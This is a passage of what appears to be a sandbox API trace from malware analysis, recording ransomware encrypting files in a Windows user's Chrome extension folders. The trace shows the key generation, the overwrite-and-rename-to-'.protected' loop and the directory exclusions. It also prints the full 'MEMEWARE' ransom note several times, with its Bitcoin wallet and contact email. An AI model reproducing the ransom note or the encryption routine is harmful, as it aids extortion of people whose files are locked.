lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0079.660] CloseHandle (hObject=0x164) returned 1 [0079.660] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json.protected") returned 173 [0079.661] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json.protected")) returned 1 [0079.661] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0079.661] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0079.661] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\RESTORE_FILES.txt") returned 158 [0079.661] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0079.663] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.663] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0079.663] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.663] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0079.664] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.664] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0079.664] CloseHandle (hObject=0x160) returned 1 [0079.664] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0079.664] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0079.664] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\RESTORE_FILES.txt") returned 148 [0079.664] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0079.664] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.664] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0079.665] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.665] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0079.665] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.665] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0079.665] CloseHandle (hObject=0x15c) returned 1 [0079.666] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0079.666] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0079.666] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\RESTORE_FILES.txt") returned 141 [0079.666] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0079.667] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.667] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0079.667] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.667] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0079.667] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.667] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0079.667] CloseHandle (hObject=0x158) returned 1 [0079.668] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0079.668] lstrcmpiW (lpString1="blpcfgokakmgnkcojhhkbfbldkacnbeo", lpString2="Windows") returned -1 [0079.668] lstrcmpiW (lpString1="blpcfgokakmgnkcojhhkbfbldkacnbeo", lpString2="Program Files") returned -1 [0079.668] lstrcmpiW (lpString1="blpcfgokakmgnkcojhhkbfbldkacnbeo", lpString2="Program Files (x86)") returned -1 [0079.668] lstrcmpiW (lpString1="blpcfgokakmgnkcojhhkbfbldkacnbeo", lpString2="$Recycle.bin") returned 1 [0079.668] lstrcmpiW (lpString1="blpcfgokakmgnkcojhhkbfbldkacnbeo", lpString2="System Volume Information") returned -1 [0079.668] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo") returned 123 [0079.668] lstrcmpW (lpString1="blpcfgokakmgnkcojhhkbfbldkacnbeo", lpString2=".") returned 1 [0079.668] lstrcmpW (lpString1="blpcfgokakmgnkcojhhkbfbldkacnbeo", lpString2="..") returned 1 [0079.668] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\*") returned 125 [0079.668] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0079.668] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.668] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.668] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.668] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.668] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.668] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\.") returned 125 [0079.668] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.668] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0079.668] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.668] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.668] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.668] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.668] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.668] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\..") returned 126 [0079.668] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.668] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.668] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0079.668] lstrcmpiW (lpString1="4.2.8_0", lpString2="Windows") returned -1 [0079.668] lstrcmpiW (lpString1="4.2.8_0", lpString2="Program Files") returned -1 [0079.669] lstrcmpiW (lpString1="4.2.8_0", lpString2="Program Files (x86)") returned -1 [0079.669] lstrcmpiW (lpString1="4.2.8_0", lpString2="$Recycle.bin") returned 1 [0079.669] lstrcmpiW (lpString1="4.2.8_0", lpString2="System Volume Information") returned -1 [0079.669] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0") returned 131 [0079.669] lstrcmpW (lpString1="4.2.8_0", lpString2=".") returned 1 [0079.669] lstrcmpW (lpString1="4.2.8_0", lpString2="..") returned 1 [0079.669] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\*") returned 133 [0079.669] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0079.674] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.674] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.674] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.674] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.674] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.674] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\.") returned 133 [0079.674] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.674] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.674] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.674] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.674] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.674] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.674] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.674] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\..") returned 134 [0079.674] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.674] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.674] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.674] lstrcmpiW (lpString1="128.png", lpString2="Windows") returned -1 [0079.674] lstrcmpiW (lpString1="128.png", lpString2="Program Files") returned -1 [0079.674] lstrcmpiW (lpString1="128.png", lpString2="Program Files (x86)") returned -1 [0079.674] lstrcmpiW (lpString1="128.png", lpString2="$Recycle.bin") returned 1 [0079.674] lstrcmpiW (lpString1="128.png", lpString2="System Volume Information") returned -1 [0079.674] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png") returned 139 [0079.674] StrStrIW (lpFirst="128.png", lpSrch=".protected") returned 0x0 [0079.674] lstrcmpW (lpString1="128.png", lpString2="RESTORE_FILES.txt") returned -1 [0079.674] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0079.675] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0079.675] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0079.675] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png") returned 139 [0079.675] StrStrW (lpFirst="128.png", lpSrch=".txt") returned 0x0 [0079.675] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png") returned 139 [0079.675] StrStrW (lpFirst="128.png", lpSrch=".rar") returned 0x0 [0079.676] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png") returned 139 [0079.676] StrStrW (lpFirst="128.png", lpSrch=".zip") returned 0x0 [0079.676] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0xd4e, lpOverlapped=0x0) returned 1 [0079.695] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffff2b2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.695] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0xd4e, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0xd4e, lpOverlapped=0x0) returned 1 [0079.695] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.695] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0079.695] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0079.695] CloseHandle (hObject=0x160) returned 1 [0079.696] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png.protected") returned 149 [0079.696] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png.protected")) returned 1 [0079.696] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.696] lstrcmpiW (lpString1="manifest.json", lpString2="Windows") returned -1 [0079.696] lstrcmpiW 